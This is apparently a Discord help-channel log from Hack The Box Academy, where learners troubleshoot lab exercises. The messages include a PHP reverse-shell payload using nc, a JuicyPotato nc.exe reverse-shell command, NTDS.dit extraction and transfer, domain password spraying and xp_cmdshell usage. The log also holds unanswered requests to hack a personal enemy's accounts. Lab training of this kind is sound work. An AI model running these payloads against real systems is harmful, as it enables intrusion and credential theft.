#modules
I'm at a loss as to how to tackle the module problem of cracking passwords with hashcat: "After decrypting the NTLM password hashes contained in the NTDS.dit file, perform an analysis of the results and discover the MOST common password in the INLANEFREIGHT.LOCAL"
Well, use the technique to obtain the passwords from that file, and then just see how many passwords are the same, hashcat has an output file mode
I have done it this way and it has deciphered them for me, but now I have the problem of not knowing how to make it tell me which one is repeated
-->hashcat -a 0 -m 1000 hash12 /usr/share/wordlists/rockyou.txt --username hash12
you're missing the rules
You'd need to analyze the output
hashcat rules are the most powerful feature of hashcat and will make your cracking time so much faster
That's not what's being asked here
For ZAP Fuzzing with cookies, I have the select all the line?
And since I have the passwords now I need to know which one is repeated 5 times to get the answer
Not necessarily just 5, but the most
Nvm, I just did not go into response.
Skill issue
I've narrowed it down a bit. I'm either doing something wrong in my payload or my netcat listen command. I now have remote code execution because my 'id' prompt works, but I cannot get the reverse shell to connect
I solved all the questions but one for the Windows Privilege Escalation Skills Assessment - Part I. I'm stuck at the first question: "Which two KBs are installed on the target system? (Answer format: 3210000&3210060)". I can't seem to be able to find it. A DM or hint on how to find it would be nice
Try using /bin/bash instead of /bin/sh
ohhh that's what it meant... thank you so much
still getting the id but no connection. My netcat just eternally says <listening on [any] 9443 . . .>
When you changed it you uploaded a new one, yes?
yes
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>
This syntax yeah?
Also if you're adding a line of code you don't need another <?php
You just add the new command after the semicolon
yes, though my tun0 ip is 10.10.14.247 specifically
I was just asking about syntax
You can replace the whole line with the ID command with that new php code
Should there be any issue with this payload?
I think it the same error
I had this error before when I hadn't changed the key perms
or maybe just similar to it? I'm sure it was permission denied though
Remove the space between the system and the ( in the second part
When your key isn't formatted right it yells at you about it
no luck, still just listening
i see
and you're running the listener before you pull the page yeah?
because if you do it after, it's not gonna connect
replace /bin/sh with /bin/bash
I have, that's what I just uploaded and tried
Hello, why is my pwnbox not accepting some of my keystrokes? I mean, every time I try to use the free terminal it doesn't let me write anything inside the terminal. Well, some of my keystrokes are working, like: "n", "9", ":", "/", and the rest are not working
works on my machine
do you mean the integrated terminal?
just use the full vm the integrated terminal is buggy
ok, I'll try it tomorrow. Thanks!!
or alternatively: set up your own vm
I'm using a vm with Parrot OS. I'll try the pwnbox that way I know if I'm missing something in my vm
¯\_(ツ)_/¯
could be a UFW setting in your vm
because if you can interact with the box you're at least connected to the vpn
Currently working through "Linux Fundamentals", and I'm not sure if I missed something or if I'm mistaken, but the questions listed under this section about filter contents have nothing to do with what I've learned thus far and what was covered in the section. I looked up the answers and they had nothing to do with anything I've learned thus far?
Anyone Know how i Get Email And Password from My Huge Enemy that Destroyed my Life?
you gotta do a little bit of searching around
but they do relate to the commands listed in an earlier part of the module
I'm having tons of issues with the Attacking Common Services Skill Assessments. I get this error when trying to hydra. I cant crackmapexec. I've tried terminating the VPN multiple times, I've tried switching VPN. Any recommendations?
May I DM you screenshots of what I'm seeing? I'm being asked questions about using cURL which I've never opened, let alone used.
don't attack ssh
why do i get this error : (node:35281) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron. See https://github.com/electron/electron/issues/23506 for more information
[35281:0313/152417.303700:FATAL:gpu_data_manager_impl_private.cc(445)] GPU process isn't usable. Goodbye.
zsh: trace trap proxychains bloodhound
when i ran bloodhound with proxychains
Yeah, I ran the wrong command. But I still cant connect to the target
why are you running bh with proxychains? run it in your own vm
I can't even nmap
"can't connect to target" it's saying can't connect via ssh
netexec/cme works better for rdp
when I ran it and put in the creds of a domain user, it says invalid
any tool for bruting a locked file on linux
Thanks, worked much better.
here's the thing: I want to use bh. I want to run bloodhound-python to get *.json using a domain user cred whose machine is not accessible from my network, so I've got to pivot, right?
after getting the *.json files I should normally start neo4j and issue the command proxychains bloodhound after
bloodhound-python is very different from bloodhound
bloodhound-python is a collector, bloodhound is the graphing tool
there's no need to proxychains bloodhound, run it in your vm locally
hi everyone. I'm stuck on the skills assessment for the introduction to whitebox module. Is anyone willing to give a nudge? I'd be forever in your favor. I'm having some trouble with the authentication
...
again, bloodhound-python is very different from bloodhound
bloodhound-python is a collector, bloodhound is the graphing tool
bloodhound-python will need to connect to the DC to collect data
in simpler terms, bloodhound-python is a tool used to collect information from active directory, after that you take those files it's collected and put them into bloodhound which is an app that runs locally on your machine and shows you the results of that information collected.
yes i know the difference , my problem is that bloodhound doesn't work
oh wait, I may have confused things with the lab. All I need is the data collected by bloodhound-python, which can be run with proxychains to get the data, and then log in to bloodhound with my own creds I set up and upload it?
you don't need proxychains
you just collect the data with the python tool and then dump that data into bh
depends on what you're doing you might need proxychains
but how will it work if it needs to connect to DC first
if you don't have a direct route to DC
yes, but he doesn't 'need' it
i need proxychains in this case no?
that's why I said just collect the data; if that forces him to use proxychains to do that, that's fine
but one way or another he needs to get that data to his machine or the machine bh is running on
i don't know because i don't know the module, i'm just telling you what the tools do and how you use them together
then you shouldn't say you don't need proxychains if you aren't sure
yes that's what i've been trying to say and i confused the matter with bloodhound , bloodhound doesnt need proxychains
you may need to pivot through 318 machines before you get that data, i have no idea of the context
if I can get the data I can run bloodhound
xre0us, I'm just explaining those two tools, not answering the specific method on how he needs to do it for his particular module.
so in the context of my answer, no proxychains is not required
if his particular engagement requires it, obviously he needs to use it then
here's the thing: your answer can be construed as not needing it at all
that's the point that was being made
right, he asked if he 'needed' proxychains to use it, i don't want him to think in the future he will require it every time
I am stuck for a long time in the AD Enumeration & Attacks module Skill assessment I on the last question. I have the creds for ||tpetty|| but I cant use them to RDP as this acc, or open a shell under its context with runas, for example (or runascs). Any nudge would be highly appreciated!
sls
I'm stuck for days in Broken Authentication - Predictable Reset Token Question 1, can anyone give me a nudge? I'm open to DMs.
I'm not sure if I'm doing something wrong with my milliseconds or my script, so anyone can look into it and give me advice?
Broken Authentication - Predictable Reset Token Question 1:
3 things:
- you'll need to try a request every millisecond for +/- 1 second, so total will be 2000 requests
- the server is in UTC, you'll need to convert to that
- make sure the string you used to generate the hash is correct, check the openmeeting php code
Module: WINDOWS PRIVILEGE ESCALATION
Section: Pillaging
https://academy.hackthebox.com/module/67/section/1637
Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer
Restore a Backup with ID gives me nothing. C:\Restore\C\Windows\System32 folder is empty. What am I missing?
almost every one of us
CPTS 10000%. Even if it's long, it will help you tremendously compared to PNPT, which covers only AD and is easy compared to CPTS. I did PJPT; I'm not denying that it was a fun experience as I was a complete beginner, but CPTS is just goated
learning so much stuff deeply
lmao deleted msg as i was replying
hello, I'm in the AD skills assessment II on the question: "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain."
I thought of creating a list of all domain users and then starting password spraying with weak passwords, but I'm having problems getting all domain users
there are 2000+ users. Is there any way to get all those without losing much time, or won't my approach work in this question?
netexec can do it, the AD powershell module can do it
thanks !
use nxc ldap will be a lot faster to get a userlist compared to the other protocols
in a linux or windows host
same as kerbrute right?
Ah, that probably is my issue. I'm probably converting from an Asian timezone
Does the date time provided by the module, in UTC? Or it follows the user's timezone?
kerbrute doesn't generate a userlist, but password spraying with it will be faster
it should be in UTC, but when you convert that timestamp into epoch time, it will use your timezone instead
https://docs.python.org/3/library/datetime.html#datetime.datetime.timestamp
Naive datetime instances are assumed to represent local time and this method relies on the platform C mktime() function to perform the conversion.
i see , i understand
but what's the full syntax to generate a userlist with nxc ldap? domain user list
nxc ldap <target> -u '' -p '' --users --log $(pwd)/users.out
you'll need to clean up the output to get a list you can pray with
cat users.out | python -c "import sys; [print(line.split()[9]) for line in sys.stdin if line.strip() and len(line.split()) > 9]" | tee users.txt
Alrighty, thank you
but what is nxc? netexec?
yes
I see, let me adjust and wait for 2k requests
ngl that question is the only one left on my entire broken authentication module
yeah seems to have tripped a lot of people up
Might be missing something here, but I'm trying to use FFUF for "Brute Forcing Usernames - Broken Authentication" instead of using WFUZZ and I can't figure out how to filter something like "Invalid Username" in ffuf. Idk if I'm having a stupid moment here. Anyone got a tip?
hello, I've done some forwarding to attack the MySQL remote service using the CSV file of all the default connection information. It's been 1h I'm brute forcing. Am I on the right track or do I need to look somewhere else?
you don't need to use a tool to bruteforce
as the cheat-sheet contains a lot of extraneous default creds
you can just manually search the cheat-sheet for mysql and use the small handful of creds to find it
it will be loads faster
Please
Onegaishimasu ("please")
i was gonna help, but saw you're a weeb
so i changed my mind /s (I haven't done this module)
based
are you sure you're restoring the right snapshot
alternatively
hidden files
You mean filter out any responses that contain those words?
Should be just -fr "Invalid user"
Yup restored all 4 snapshots, yet nothing
Anyone do the "Password attacks lab - hard"? I'm struggling with the vhd file
What about it?
Yeah It's not working.
It's just returning all of them -
Accessing it. I think I have it mounted. When I try "cryptsetup bitlkOpen" it requires a passphrase but doesn't work with the passwords I have. Tried to bitlock2john it to see if I can crack the password that way but john doesn't recognize it.
I tried this cred but it doesn't work :/
one of these is in-fact correct
should be able to bitlocker2john it then crack it
you put the output of bitlocker2john into its own file
and if you curl it you are sure that exact phrase is part of the response without any html stuff between?
Just tried both but says no password hashes loaded
Didn't get any errors but will try python2. Is it the whole vhd file or just the partition?
the whole vhd
you don't run bitlocker2john on a partition
bitlocker2john requires a file input
Was missing a -i flag this whole time
Thanks for your help
thanks a lot, it works, but it's strange because I used this shortly before and it didn't work
you were likely using bad syntax
Module: BLIND SQL INJECTION
Section: Out-of-Band DNS
I've resolved this exercise using the internal custom DNS record as described in the module. However, I had some comprehension questions if anyone has any insight:
-
Presumably, we cannot use Burp Suite Collaborator or the https://app.interactsh.com/#/ service because either would require external network connectivity and the instance cannot make DNS calls to the internet to perform the attack.
-
The section lists towards the end of the Custom DNS record portion that, "As we are using a custom DNS domain and have access to the DNS server logs, we do not need to setup another listener like interact.sh to capture the logs (though it is still an option)"
I'm interested in understanding the point they're making in bullet #2. I'm assuming they're referring to pulling the Git repo for interact.sh and running that service. Has anyone been able to perform the exercise this way? Am I understanding this right?
Just from what the statement says, it says you already have the logs so you don't need to setup a listener to obtain those logs, however if you didn't have access to the logs already setting up another listener is a way to obtain them.
as for using the tool, i haven't used it so not sure about how you configure it or the syntax
Okay, I think I follow. The statement isn't referring to internal/external activity, but ability/inability to read logs.
That makes more sense when I read it.
right it's saying you already have the logs so you don't need to setup the listener
Update - I'm a dipstick, it was using GET not POST
derp
hey everyone, I am currently stuck here. https://academy.hackthebox.com/module/112/section/1079 I know from the hint that I need to investigate Sql management studio but I am struggling to get it run on my kali vm
You don't run sql management studio from your machine
You must first find a way onto the box: from there things can become clearer.
Step 0: enumerate
rdp?
Thats for you to figure out
ok
Always enumerate your target first. Which is what this module is all about
yes, i ran nmap against it
Then use the knowledge and tools from the module to help you move forward
trying
Two remain
the quality of these modules has vastly exceeded my expectations
i think the top 3 as of this point are Understanding Log Sources & Investigating with Splunk, Introduction to Malware Analysis, and Introduction to Digital Forensics
these three modules are organized neatly and have a vast wealth of information with lab exercises that make you really think outside the box
the skills assessments are done well, testing your newfound knowledge and analytical skills
i can't wait to see what Detecting Windows Attacks with Splunk will offer
hello, I'm on question 7 of AD skills assessment II: "Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host."
I got the creds from the config file and when I try to log in via mssqlclient.py it doesn't work for some reason
how can I use the spoiler tag on an image? I don't want to spoil by showing my command and the output of it
there's a little eye button on the image when you select to upload it
you'll want to make sure you're inputting the user/pass correctly, so maybe don't copy/paste it. beyond that, if it's not working, it's very likely a red herring or creds for another service
you may need to enumerate more
one thing i've noticed in the modules is there are red herrings
the thing is that i already ran the command before for other challenges
do you mind if I dm you? I still haven't gotten the required flag :/ im not sure what to change on the script anymore
shells and payloads live engagement.
the parrot foothold box is not connected to the internet and has no web browser
so how do I upload payloads
and browse the sites? also I can't nmap because it's not a su account
can't sudo either
but I can't upload files to the site
like this hint
I can't access the blog because **there is no web browser**
dm me your script
and i cant nmap because i cant run sudo
so you're on computer a, and you want to transfer a file to computer b? or what?
you can access the web browser iirc
I have to remote into the foothold box. That ONLY has access to the 172.x.x.x network; outside PCs do not. I'm "supposed" to enumerate the IPs and upload webshells etc. One is supposed to be a WAR file upload to get a shell. Another IP is a blog I'm supposed to browse. But I can't because I can't nmap and I can't access a browser
where lol? when I look it up the only one is tor and it won't connect
it's times like these where it's necessary to suffer
you could do ssh tunneling
wow i've got a web browser on the foothold!
which one
firefox
wot i searched and it didnt come up
wtf
just type firefox in the terminal
can someone help
[-] ERROR(SQL01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
SQL Server supports two authentication methods, Windows authentication and mixed mode. Windows auth is auth via Windows/AD, while mixed mode supports Windows/AD auth and the SQL Server username/password pairs to log in.
sounds like you might be using the wrong authentication method, but idk because i have not done that module.
your error message indicates it's a problem with integrated authentication
well im in an ad env so i should use windows-auth
right?
nvm i used sqlsh and worked
depends on how the sql server was setup
walkthroughs
Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer.
I used nmap to scan and got the result: Host script results: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: nix-nmap-easy | NetBIOS computer name: NIX-NMAP-EASY\\x00 | Domain name: \\x00 | FQDN: nix-nmap-easy |_ System time: 2023-06-25T13:16:13+02:00. Why is the answer Ubuntu instead of Windows?
SMB is primarily a Microsoft Windows protocol (it was designed to run on NetBIOS)
that's why you see Windows there
some other telltale signs:
the OS that nmap detected (if it's a Windows machine, it's highly unlikely that there would be any mention of Linux)
the computer name (nix is shorthand for Unix, signifying a Unix-based system)
the lack of a domain name (if not domain-joined, it would most likely say \\WORKGROUP)
which cert does this fall under? I don't believe it's under CPTS right?
CDSA
nice
Does anyone know how to transfer the KeePass file to our pwnbox in the password attacks hard section?
in my kali vm gobuster wasn't installed and I tried to install it regularly, had issues, so opted to do update && upgrade, only to realise my library blocks access to kali.org lol. Any workaround to this apart from using a VPN?
??
why they dont have CDSA thread in the discord :))
thinking of doing bug bounty hunter path after soc analyst
? Anyone any clue ?
???
Do I have to get VMware pro to take a snapshot or is there another way?
nibbles box is unstable AF? anybody experienced the same?
If you're on Windows and are using VMWare, just take the screenshot from Windows... ez
Sorry I meant more like a backup of my current OS configuration rather than a picture.
you can compare them on their website: https://www.vmware.com/products/workstation-pro.html just hit compare
looks like you do need pro for snapshots
I am at Module: Password Attacks, Section: Attacking Active Directory & NTDS.dit. Has anyone encountered being unable to copy the NTDS.dit over to the attacker machine even after setting up the SMB server on the attacker machine and executing this command "cmd.exe /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit" using the Evil-WinRM terminal?
firstly, did you make a directory called NTDS in C drive?
You are referring to the C drive on the attacker machine right
yeah
Yes I created a share called NTDS
the command you wrote wouldn't transfer it to your attacker machine, looks like it's trying to copy it to the c: drive
are you trying to transfer the the file over or create a copy of the ntds.dit file?
Oh now that I look at it, it just seems that I am just copying NTDS.dit from its original directory to C:\NTDS
I am trying to transfer the file over to attacker machine (linux)
the easiest way i've found to transfer files from windows to your kali box is by using an smb server. use smbserver.py to create a smb share, then in your windows machine you can just navigate to the share folder and copy whatever you want to it
okay then you can set up your smbserver and use
copy C:\NTDS\NTDS.dit \\<IP>\<sharename>
Ok I understand what you guys mean now
easier than that, you setup the smb server and you can just open it in explorer
but yeah that works too
Xfreerdp is not available haha, so only through terminal
I think he is on winrm session
Thanks @soft cedar @cloud urchin for the help
what should I be looking for when trying to find the domain of an SMB client? i've tried nmap, enum4linux, rpcclient. cant seem to find any information about the domain
nmap usually has it
tried -sV and -sC can't find anything with domain info
is there a website you can connect to and look around?
nope ;c
try smb-enum NSE script with nmap
that's an smb enumeration script
You can use crackmapexec / ldapsearch
crackmapexec smb <IP> : should find the domain name.
@soft cedar kk let me try that, dont have cme downloaded on my machine
Is anyone able to help me out with the Advanced XSS filter bypass section? I'm able to bypass the filter successfully, but I can't seem to get an admin to view the exploit.
"Secondarily, in this attack the attacker might be attempting to cloak their address with a decoy, but the responses for multiple closed ports will still be directed towards them with the RST flags denoted for TCP."
Arent the RST responses sent to both decoy ips and attackers ip , since responses are sent based on the source ip address of the requests. why the above line from htb stating that no matter what decoys attacker is using the responses are sent to the attackers ip ? Am i wrong ?
Hello everybody, thanks for the previous help you gave me. Currently I am stuck in the section "Privileged Access" in the "Active Directory Enumeration & Attacks" module on exercise n°3: "Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt." I used xfreerdp to connect and after that used the tool "Get-SQLQuery" and it works, but I would like to execute the script "mssqlclient.py"; the Windows machine doesn't have Python installed and from my Kali I cannot directly access the IP address of the SQL machine (10.129.230.228). Do you think I need to use "chisel" or another kind of tool? Thanks
cme smb did not work for trying to find the domain. I already got the flag and have been stuck on finding this domain for 1hr ;c
did smb-enum-domains.nse not work either?
What are you trying to do?
Is it a module / box?
Yes, youโll need to pivot in this case.
that didnt work
but I ran enum4linux and it worked. I think I was just tired and overlooked it
thank you guys for your help so much, idk why that took me so long
ty human god and 0x5
there are windows tools that can communicate with sql, like sqlcmd
Do you recommend a tool for that?
Yes I did but when I execute the command EXEC sp_configure 'xp_cmdshell', 1 it's not working
ligolo-ng makes the whole process easy
Thanks
I think itโs EXECUTE not EXEC.
thanks
repost from #858470491676737536 :
henlo pals. i hope this is the right channel for this. can someone fill me in on what the issue is here? i figure its a vpn issue, but not completely certain. this happened on Module: Network Enumeration with nmap , Section: Firewall and IDS/IPS Evasion - Medium Lab i spent like 6-8 hours banging my head against this simple exercise only to discover this was the problem. it is also affecting me now on the Hard Lab as well. i get two completely different scan results from the same target depending on the machine i am using. i am worried this will affect all of my Labs in the future. seems like a big-ish deal to me. any advice is appreciated.
Raise it to support and please mask the command
thanks i'll delete the screenshot and make a new one.
I'm working on the skill assessment for the Windows Attack and Defense module. I have completed the attack but I can't find any logs under the Id 4886 or 4887
Just use mimikatz. I moved mimikatz to target machine and got the answer
do i have to do anything with runas /user:eagle\rocky cmd.exe? I dont think so but just to be sure
Can anyone please help me here? It is the last module for me...
in Attacking Enterprise Networks - Post Exploitation Im trying to double pivot using ligolo-ng. It works fine, but when I ping - 172.16.9.3 for example - no answer...
Also when I tried to add a new route: sudo ip route add 172.16.9.0/23 dev ligolo2 - I get error that Error: Invalid prefix for given prefix length.. So I added /24 instead but that probably not right...
ip route doesn't like CIDR notation, also you'd add the route 172.16.0.0/23
for routing you add the route host (in this instance 172.16.0.0)
Hello how to capture login password with Wireshark ? plz
So like that: sudo ip route add 172.16.0.0/23 dev ligolo? that doesn't ping 172.16.9.3 either...
well here's the other part to that issue: does the device you're trying to forward through have access to that network?
in ligolo you also do need to connect to the session (aka start) that has the appropriate routing
yes I connected and started using another route (double pivoting)
¯\_(ツ)_/¯
i'm sure someone with more knowledge than me can answer it
but bear in mind many people do the module blind
I use 172.16.8.3 to access 172.16.9.3. right?
that i can't answer
i haven't done that module to be able to tell you
idk if that network is segregated instead into /8 or what have you so the host bits are 172.16.8 and 172.16.9
You can see in ligolo - the ip range is /23..
separate interfaces btw
also that ip is the other interface on that device
Yea.. I want to access 172.16.9.25. Now I can only access 172.16.8... but not 172.16.9.. even though I added double pivoting and I can see that the interfaces changed to that second machine...
Didn't work. never mind.. thank you anyway, I just really wanted it to work with ligolo-ng..
Module: Password Attacks, Section: Credential Hunting in Windows. Does anybody have an issue transferring LaZagne from attacker to target, and after transferring LaZagne to the target, trouble executing the lazagne.py file because the target does not have pip or python?
use the exe? https://github.com/AlessandroZ/LaZagne/releases
there's a LaZagne.exe
Any hint on broken auth skills assessment? I found all support account and their password, also decoded and understood how cookies work but cannot obtain privileged account... Now Im trying to find any admin* account via message.php. I got an hint from the register form it say invalid prefix when I try to create a user with name admin*, am I on the right path?
I GOT IT
Guys need some help with this question from Skill Assessment "INTERMEDIATE NETWORK TRAFFIC ANALYSIS"
Inspect the funky_dns.pcap file, part of this module's resources, and enter the related attack as your answer. Answer format: "DNS Flooding", "DNS Amplification", "DNS Tunneling"
My answers: "DNS Tunneling", "DNS Enumeration"
What am i missing ?
2 things:
- understanding how DNS flooding and DNS amplification attacks work will help
- knowing what patterns to look for in the traffic that are indicative of each attack
also, DNS Enumeration isn't an option.
need help on AD SKILLS ASSESSEMENT II : Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
got a revshell but can PE
can't
SeImpersonate was enabled, but it wasn't covered in the module until Windows PE
so i probably should try smth else but im stuck
why not try it
you can find different ways to the flag
i tried
but everything failed, used printspoofer but a cmd of admin popped up and then i get back to my ps session with low privilege
also tried juicypotato which resulted in an error while execution
juicypotato will work, try a different CLSID
the command is ||.\JuicyPotato.exe -cmd "C:\Users\Public\nc.exe -e cmd.exe 172.16.7.240 4040"|| right?
https://github.com/ohpe/juicy-potato try a different CLSID
wait, what's that? I just followed a medium blog about SeImpersonate since I was frustrated, but none of them talked about CLSID
when using juicypotato
how do you specify the CLSID?
read the docs
lmao
this part sucks, why would they put in something that wasn't covered before
it is technically covered https://academy.hackthebox.com/module/143/section/1276
i think im blind since i dont see it
because it's in this section https://academy.hackthebox.com/module/143/section/1275
I'm just at this stage now. It took me so long to get the rev shell right
im stuck there for 1 day rn
just got the revshell and struggling to get system lvl
yes but
it wasn't technically covered, it's more like a "what you can do", and you'll be able to do one once you reach Windows PE
I'm currently on the password attacks lab hard. I want to transfer a KeePass file from a Windows machine onto my pwnbox. I tried to set up an SMB share and transfer it but it didn't work. Any clues??
do some of these labs work better on parrot os vs kali? Has anyone noticed a difference?
I don't think you even need to set a clsid, can't remember
what's the error
i think it was something with commands , i just gave up on it and went with printspoofer instead
What are some other options to use in a nmap scan other than -Pn to get past host seems down. I've tried decreasing the speed and use random ip addresses however I still get a host seems down message. I don't seem to get the full out put when I use -Pn so I try to avoid using it. Could it be because I'm running a vpn in the background there's a connection issue or something?
even -T3 -D RND:5 --source-port 53 won't allow me to scan the ipaddress
are you able to ping the host? Or get other responses from the host?
-Pn doesn't send an icmp echo request, which some devices don't allow a response to by default
just did footprinting medium lab! is my fav till now
time to go for hard
maybe you got flagged by the firewall at that point?
Yeah that's why I try to avoid the -Pn option but I'm not getting a response otherwise
Disabling arp is a good thing to do as well
You're gonna use a multitude of techniques, RND was never needed for me
--disable-arp-ping hasn't worked either unfortunately. I've been getting away with just using -T4 but this lab isn't letting me do that this time
should I just regen the target?
Any one knows how to use XXEinjector tool
-Pn --disable-arp-ping i used if i remember correctly. with other commands ofc
the -Pn option does work I know that but doesn't give me the output of -sV -sC when using it only the ports
Try resetting the box and trying again
If you got blocked, then you're gonna be getting nothing
Regardless if your command is right or not
^
okay
just reset the target, its faster 
whats the best way to scan these boxes? my nmap's going slow AF on HTB machines. i've been dealing with it for the most part but really want a detailed scan for skill assessments and it's like 1% a minute
I'm still stuck. I can get a shell with PrintSpoofer which I assume is supposed to be the one that has the privs to get the creds but the shell doesn't do anything 
I have a payload ready to go just need that shell to work
don't do a service or script scan; instead with a full-port scan add -T4 for a slightly more aggressive scan timing which lowers the max retries and max timeout time for scanning ports
my default is -A -T4 -p-, i know -A slows it down hella bad but even without it, it still takes ages
did you follow the instructions from windows pe module ?
or just a blog online
if you set up printspoofer with netcat you should be able to get a good system rev shell
Alright let me see this module. It has to be close 
I have an issue with white box testing, an error said "code injection should not be possible, even without sanitization or validation", but the only time i use the inputs is here:
```js
console.log(type,"password - length",length,':', password);
```
just the SeImpersonate section
its short and easy
im stuck on the last 2question rn 
Any idea why that is? I don't get why it doesn't work.
hello guys i need help,
module: Using Metasploit Framework
section: MSF Sessions - Sessions&Jobs
my problem: I got into the machine but I can't find the right payload to increase my authorization.
can anyone help me on BROKEN AUTHENTICATION Predictable Reset Token, question 2 was easy but i cant figure out question 1
Right yeah that's exactly what I did and I get the shell but it just stays blank 
well according to the question, an old version of sudo is running - so search that
Maybe I got some dodgy binaries
there's ways to find the version of something, usually -V or -v
can you do whoami?
weird
I used a few modules but it didn't work.
Nothing at all, it just says it caught the shell and then stays blank
first in the shell try and find the current running version of sudo on the system
I wonder if its cause I downloaded nc64.exe instead of looking on the machine for an exe
Will have a look
And... My own box died
yes happened to me lmao
i need help to get to DC01
i have the genericALL right
i tried to use it to get the dc01 admin but i dont know how
i tried to change the admin password but it changed the admin of ms01 not dc01
"submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host."
idk what im doing wrong
its work thx
thx for your feedback, i had the same issue with the fact that it shouldn't crash which is weird. A hint tells you to throw an error when the conditions are not met. anyway thx
Just as bad
Okay, I switched nc versions and I got the real shell 
sounds like you might have some connection issues
nvm
lets goooo
Active Directory (AD) is the leading enterprise domain management suite, providing identity and access management, centralized domain administration, authentication, and much more. Due to the many features and complexity of AD, it presents a large attack surface that is difficult to secure properly. To be successful as infosec professionals, we ...
this module was sooooo fun ngl but the skills assessment made me lose time over stupid thing such as getting rev shells,googling,transfering files
gosh i love htb, i learned a lot
Finally got that system shell. Ye haww. Just before the kids get out of school
Always have hella ping times on these boxes, swapping vpns/servers does not help. ms is usually mid 50's for the server i pick
well these wildly inconsistent ping times would explain why it takes a long time
try doing it from the pwnbox (turning off your vpn first) and see if the issue persists
it happens when the target just spawned, give it a few mins to stablise
also the ms sounds like pwnbox server not vpn region
vpn-region would be (Us/EU)-academy-(1/2/3)
box has been spawned for awhile, -A nmap has been running for 51 minutes at this point lmao
the US EAST/US WEST/etc.. are pwnbox regions which are completely separate
I have a doubt, anyone know how to transfer a KeePass file onto our pwnbox? I tried using a share but it didn't work in the password attacks hard lab
@ember coral I take it this image reflects what you're meaning by "my ms shows as 50 ms"
xfreerdp has the /drive: option
Honestly not sure where i remember seeing it, just went in and downloaded a new VPN trying US Academy 3 instead of 1 and dont see it, but remember seeing it somewhere lol.
you were likely seeing the pwnbox connection speed
which is what my screenshot is displaying for me
the vpn speeds don't have a connection time visible
ah yeah you're right, i see it now on pwnbox. I prefer not to use the box but i can do my scans there and work from my machine if needed i guess.
this at least partially proves that you're doing the right things
lol
hey why can't i txt in general
This might only be me but i read the modules but the questions seems like it has nothing to do with them. Rn im doing filter contents and i dont understand a single question what it wants me to do.
i look up what i have to do on google but i need root perms to access all the ipv4 services, but it seems i cant get root access when on the target
Sudo works just fine
when im on my vm ssh to target i cant get sudo to work
sudo netstat -tunleep | grep -v "127.0.0" | wc -l
htb-student is not in the sudoers file. This incident will be reported
0
Hmmm so I switched to my parrot os vm and running locate gives me a command not found error is that normal?
I know how to fix it just wondering if thats normal
also mssqlclient.py seems to not be on there but I'm sure it's on my kali machine
You shouldn't need sudo for netstat
You might need to do sudo apt install locate
Yeah I did, the real issue was parrot os doesn't have mssqlclient for the lab and I couldn't figure out a way to install it since I didn't see it in any github repository
It'll be under impacket
I can assuredly say it's there bc it's on mine ¯\_(ツ)_/¯
Well shit I found it lol my bad, I ran locate and it didn't show it
Locate can be dumb
worked on my kali machine interestingly enough
But if it autocompletes, it exists is my general rule of thumb
I'll give parrot another try lol, I gave up too easy
why cant i access general
like chat
how can i access general
like chat
.
when can i access general?
like chat??????
I am in attacking common services: DNS. I have ||enumerated the subdomains using subbrute and have found a flag in the TXT records of one of the inlanefreight.com subdomains. It is not working. I am assuming it is a leftover flag from another exercise? Where does it want me to go get these flags? Maybe dig is not the right tool for the job on this one.||
Please help
Go to the welcome channel and put in your htb credentials in the bot command channel
Not credentials, just account identifier
Which is found by following #welcome
Mb what MarcieLee said
Ooi
Done with Footprinting module
SSH was hella slow
Because you're meant to go after inlanefreight.htb
I knew it
Wrong site entirely
Working on that module now definitely has taken me longer than 2 days
Tonde gemar join discord
whole module? or only the 3 labs at the end?
I always spend all the time on the module and dont read the question well lol
Help me
With?
Thanks
The whole module some days I didn't do it because of college work taking my priority and I spend a little extra time taking notes
I've got 2 more to do then then the 3 labs at the end
oh yea the whole module takes some time.
good luck! medium was my fav and on hard the only "hard" thing was getting the foothold
Sounds like ssh stuff, interesting
ssh is somewhere before the end, before you get the flag
dont attack ssh service 
Okay bet 
it gives me permission denied when i do it without sudo
i cant access the website in windows on htb academy
is this like only possible with VM
cuz kali and C# are uh uh so its best to do it in windows
cant find the solutions to these questions. I have read everything but cant find anything that has to do with this
I mean what have you tried
when I run any DNS enum tools or commands on inlanefreight.htb I do not see a nameserver. if i use the ns1.inlanefreight.com one, I can actively subbrute, but not for inlanefreight.htb. there is no nameserver that I can find for inlanefreight.htb.
||└──╼ [★]$ cat resolvers.txt
ns1.inlanefreight.com
┌─[us-academy-1]─[10.10.15.203]─[htb-ac-30427@htb-mota8xpkb2]─[~/Desktop/subbrute]
└──╼ [★]$ ./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
Warning: No nameservers found, trying fallback list.
||
Use the target IP as DNS server
hey i'm trying to install odat.py using the provided script but I'm getting an externally-managed-environment error during the installation
OK DNS is always the bane of my existence. I have tried dig commands for ANY, AXFR, TXT on all these subdomains. I have not seen any flags. Am I just being impatient since the subbrute isn't finished? or are there any other digs I can use. here is an example dig command, below that is my subbrute:
||dig axfr hr.inlanefreight.htb 10.129.125.41||
||./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
inlanefreight.htb
hr.inlanefreight.htb
helpdesk.inlanefreight.htb
ns.inlanefreight.htb
control.inlanefreight.htb||
Hello, I'm using the HTB academy free subscription and I'm currently studying the Linux module and I can't unlock any module even though I have enough cubes. Can anyone tell me why this occurs?
look up how to open a sqlite db, it's also in the module
Remember that not all zones allow a zone transfer.
